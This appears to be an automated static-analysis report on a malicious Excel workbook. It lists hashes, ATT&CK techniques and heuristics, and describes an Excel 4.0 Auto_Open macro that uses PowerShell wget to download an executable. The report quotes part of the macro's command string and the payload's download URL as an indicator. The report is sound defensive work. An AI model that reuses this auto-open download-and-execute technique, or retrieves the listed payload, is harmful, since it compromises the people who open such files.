Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 db76aa51b4d93056…

MALICIOUS

Office (OLE) / .XLS

535.5 KB Created: 2021-07-29 19:03:34 Authoring application: Microsoft Excel First seen: 2022-07-22
MD5: 8a1f364a38b312c113f129abb3864a3e SHA-1: f35cc7787821689bbdd16a38e9a5cd6c3608dd91 SHA-256: db76aa51b4d93056d14c223ea06b0184dee71bd1feff3035007c5b240c4470c1
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The presence of an Excel 4.0 Auto_Open macro indicates an attempt to automatically execute code upon opening the workbook. The macro references PowerShell and includes a sequence matching 'POWERshEll.ExE wGet https://', strongly suggesting it's designed to download and execute a secondary payload from the provided URL. The URL itself, while flagged as confirmed benign in the provided evidence, is still included as an IOC due to its explicit inclusion in the macro's logic.

Heuristics 5

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www72.zippyshare.com/d/CDE7qXWZ/27182/Fud.exe

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt
77526317693988808943c9b58a3ee3cfe53fc53006ec2ab7a604bb8c52dec5d0		 xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 916 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.